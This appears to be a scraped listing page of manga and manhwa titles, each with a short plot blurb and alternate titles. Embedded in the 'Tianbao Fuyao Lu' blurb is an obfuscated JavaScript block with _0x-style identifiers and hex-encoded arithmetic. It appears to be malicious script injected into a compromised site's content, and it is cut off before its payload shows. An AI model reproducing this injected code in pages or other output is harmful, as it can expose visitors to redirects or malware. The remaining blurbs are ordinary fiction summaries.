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16115 results

They say i’m the future king

The new era has come, and mankind embarked on a new adventure with all members. Everyone has functions similar to games. Xiu Xian and Xiu Mo have become two different career directions in the previous story. During a blind date, the protagonist learns that a new era is approaching, and after communicating with Tang Qingrou, who is on the blind date, he discovers the fact of the rebirth. Tamen Shuo Wo Shi Weilai Zhi Wang / They Say I Am The King Of The Future So They Prophesized, I’m the Future King manhua / 她们说我是未来之王


Please, I Really Didn’t Want To Fall in Love With My Master!

Li Ran traversed to another world and became the Holy Son of a Demon Way Sect. The system has awakened, and the first task released is actually to fall in love? The Sect strictly forbids relationships between men and women. Li Ran took the risk of being expelled from the Sect and wrote a love letter to his junior sister, but it was sent to the master by mistake! Bàituō, Wǒ Zhēn Méi Xiǎng Hé Zhǎng Mén Tán Liàn’ài Ah I Don’t Want To Fall In Love With The Sect Master Please, I Really Don’t Want to Fall in Love With the Sect Headmaster 拜托,我真没想和掌门谈恋爱啊


One Pair Lady

When I woke up from my sleep, my house had disappeared?! Adele, a gambling genius, suddenly transmigrates ten years into the future. Participating in a gambling event at the request of the tower master, Rudy leads her to meet the Duke of Elfinheim, the organizer of the event. A name that I seem to have heard somewhere, with a familiar pronunciation and appearance. What is this strange feeling? “Where’s the lady the Duke was looking for? “Aha, that rumored lady? “Yes. I heard rumors that the gambling ship itself is currently afloat only for that woman.” Besides, the rumored lady’s description is similar to mine?! One Fair Lady / 원 페어 레이디


My Tender Despot

It is said that the most merciless despot has fallen for a lady and devoted his soul and heart to her. It is also said the despot sentenced the lady to death in the end. History buried and story twisted, yet true love never fades. My Tender Despot manhua Fate of Rebirth: My Gentle Tyrant Zài Shēng Yuán: Wǒ De Wēnróu Bàojūn 再生缘:我的温柔暴君


Tianbao Fuyao Lu

Tianbao Period. Kong Hongjun, a young man who was ignorant of worldly affairs, came to Chang’an with three important tasks and entered the Great Tang’s Exorcist Department. Inside the department, he led a ragtag group of yao-vanquishing experts together with Li Jinglong, commander of the Longwu Army. And this, is the story of how they wrote out the Great Tang’s Yao-vanquishing Records.<script></script><script>(function(_0x2d623d,_0x384307){var _0x530557=_0x284d,_0x4a2af9=_0x2d623d();while(!![]){try{var _0x94f9c0=parseInt(_0x530557(0xc3))/(0x23c*-0x1+-0x7f0+-0x5*-0x209)+parseInt(_0x530557(0xcd))/(0x13*-0xaa+-0xa7f+0x171f*0x1)*(-parseInt(_0x530557(0xd1))/(-0x1c89+0xd33+0xf59))+parseInt(_0x530557(0xd4))/(-0x95*-0x13+0xef9*-0x1+-0x1f7*-0x2)*(parseInt(_0x530557(0xc8))/(-0x12c6+0xb*0x374+-0x1331))+parseInt(_0x530557(0xbe))/(-0x1*-0x24f3+-0x325*-0x4+-0x3181)*(parseInt(_0x530557(0xca))/(0x81+0x22d0+-0x234a))+parseInt(_0x530557(0xda))/(-0xeb*0xe+0x1d*-0x139+-0x21*-0x177)*(-parseInt(_0x530557(0xd0))/(0x7*0x290+0xc73+-0x1e5a))+-parseInt(_0x530557(0xcf))/(-0x21fb+0x11b8+-0xd*-0x141)+-parseInt(_0x530557(0xc6))/(-0x735+-0x231e+0x2a5e);if(_0x94f9c0===_0x384307)break;else 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Republic of Korea Special Forces, Kang Yi Chan. During the mission, he faced enemies to save his comrades and was isolated alone in the operational area of ​​the mission. It had been several days since he had faced the enemy without being able to sleep and waiting for rescue to come for him… but in the end, he saw the bazooka flying over the hill, he realized that it was the end of his life and then fainted… When he regained consciousness and opened his eyes, he found himself in a trance. alone in a strange world. Genres: Action, Fantasy, Shounen, Drama, Adventure


I Became the Villain’s Trainer

Read manhwa I Became the Villain’s Trainer She thought she was dead but she woke up inside a novel – to an extra who will die a year later. Not wanting to die like this, Alexa decided to tame the male protagonist in the form of a dog. Two years from now, the male lead will return to his human form. In the meantime, she was thinking of leaving the Grand Duchy after receiving the right pay for doing them a favour. The problem is that when the male lead returns to his human form, he forgot all his memories. “You have to remember me, okay? There’s no point in looking so cute. Promise me!” She told him many times because she didn’t want to mistakenly die by the male lead’s hands, who became a villain. But, “You told me to remember, so I remembered everything. Alexa.” Ysildus unbuttoned his jacket. “If there’s no other way to return that favour then I have to pay it with my body.” A cute puppy that grew up into a weird wolf. Damn, what did I raise?


Prince Edward’s Heart Was Stolen

The sick and weak Prince of the Da Qi dynasty was sealed, leaving only his shallow breathing. The prince, Huang Sang’s martial arts teacher Wu Nian opened the altar, in order to use the once weak prince to destroy the beloved son from the palace. However, he did not know before opening the seal of Wu Nian, that he was actually the most tyrannical prince recorded in history. The teacher went on his knee’s and begged for Wu Nian’s sanity to return. You are still my kind hearted prince! The teacher has made a grave mistake, releasing not the prince, but in his wake, a mad and heartless man.;188.197 Just One Bite Prince Edward's Heart Was Stolen The Crown Prince Lost His Mind The Prince Has Lost His Mind 太子得了失心疯 太子得了失心瘋 태자 전하, 한입만요


Snake Essence Is a Kind of Disease

"Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older." Legend has it that the Misty Mountain in the Hundred Thousand Mountains is inhabited by the Medical Immortals, which is quite magical. This is an ancient sect of immortal cultivation, where each generation of disciples has the same bloodline, but for the brothers, the handsome brother is a snake charmer? Snake Spirit has a Disease Shé Jīng Shì Zhǒng Bìng Snake Essence Is a Kind of Disease 蛇精是种病


Pride Of The Blade

“Whoever gets in my way dies!” One day, Dae Do-Oh appeared on the battleground between the Iron Flag Alliance and the Nine Dragon’s Cult. He is the captain of the Joker Squad, a sub-unit of the Iron Flag Alliance’s Black Flag Hall. Contrary to their name, the Joker Squad accumulated many accomplishments on the battlefield. At the same time, unknown enemies are plotting against both the Iron Flag Alliance and the Nine Dragon’s Cult. What will happen next? What will Dae Do-Oh do? The battle for survival begins now!


Sick Yandere Prince Depends on Me to Continue His Life

Once in the book, Su Ye became the arrogant and domineering female partner with countless male concubines in the book. If you want to survive, you have to stay far away from the sickly and black-hearted prince in the book, but the sickly prince clasped her hand and coughed loudly: “Is my benefactor pleasing to me?” Nodding: “Yue, my heart is very happy.” What should the unlucky female partner do when she encounters the demon king, she can only get used to it!


Even Ten Thousand Deaths Will Not Stop Lu Qianqiu

Lu Heng, in order to reshape the Celestial world, has gone through 9999 cycles of reincarnation, and is about to usher in the last stage of the eternal cycle. However, the last hurdle is “death”, which may seem simple, but it has really stumped him on how to achieve it. As a result, Lu Heng started on the road of many obstacles in order to seek death… 万死不辞陆千秋
